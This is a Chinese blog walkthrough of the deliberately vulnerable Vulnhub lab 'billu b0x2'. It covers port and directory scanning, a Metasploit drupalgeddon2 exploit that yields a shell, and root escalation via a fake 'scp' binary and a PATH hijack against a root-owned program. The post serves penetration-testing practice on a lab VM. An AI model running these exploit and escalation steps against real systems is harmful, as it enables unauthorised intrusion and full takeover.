Vulnhub靶场练习:billu b0x2

  一、环境搭建

1、靶场环境官方下载链接:https://www.vulnhub.com/entry/billu-b0x-2,238/,到Download处下载

2、靶场环境为.ova格式,使用Oracle VM VirtualBox虚拟机软件导入即可

3、启动靶场环境,为了方便练习,已经设置虚拟机网络的桥接模式

 

 二、攻略步骤

1、因为靶场启动之后,首页直接出现了ip地址,所以省略了收集ip的步骤,直接扫描端口,寻找突破点

输入命令:nmap 192.168.0.102 -p- -T4

 发现有开启80端口,一般突破点都是从HTTP网页上边来突破,所以可以直接访问寻找突破口

2、打开浏览器访问http://192.168.0.102/之后,发现有登录框,搜索框,网站为Drupal框架

 

 3、使用dirb进一步扫描探测目录,看是否有更多文件,发现robots.txt文件

 

 访问之后,发现更多信息泄漏的文件

 

 3、根据扫描的目录,发现有/core/install.php页面,访问得到Drupal框架具体版本

 

4、Drupal有一个注入漏洞,可getshell,所以可以尝试一下,启动MSF来直接利用

输入命令:msfconsole,启动MSF

输入命令:search Drupal,来搜索要使用的针对Drupal攻击的利用脚本

输入命令:use exploit/unix/webapp/drupal_drupalgeddon2,进入利用脚本

输入命令:show options,显示需要利用脚本的话要设置的参数

 

脚本要设置的参数已经设置了默认的部分,只要设置RHOSTS攻击的目标地址就行

输入命令:set RHOSTS 192.168.0.102,设置要攻击的目标ip

最后输入命令:run,执行攻击,成功getshell

 

 5、当前shell交互如果觉得不舒服,可以执行python -c 'import pty; pty.spawn("/bin/bash")'  来获得交互shell

6、因为目标设置的为需要root权限,当前权限仅为www-data用户权限,所以下一步需要提权

输入命令:uname -a,查看当前系统内核版本

 

 

 7、收集系统下文件信息,在/opt目录下,发现一个文件名为s的可疑文件,所有权限都为root

 

 

 8、使用strings命令,查看二进制,发现在执行scp命令时候使用root权限,但是没有指定root下的绝对路径

 

 9、根据上边得到的信息,我们可以创建一个假的scp命令之后,将假的scp命令添加到环境变量之中来实现提权

输入命令:cd /tmp,切换进入到/tmp临时目录

输入命令:echo "/bin/bash" > scp,将运行“/bin/bash" shell的命令写入到名字为scp的文件之后

输入命令:chmod +x scp,赋予scp文件执行权限

输入命令: export PATH=/tmp:$PATH ,将/tmp目录追加到现有的环境变量之中

输入命令:cd /opt,切换回之前的/opt目录之中

输入命令: ./s,执行s脚本,成功提权

 

 完

posted @ 2020-07-31 21:09  bonga  阅读(507)  评论(0编辑  收藏  举报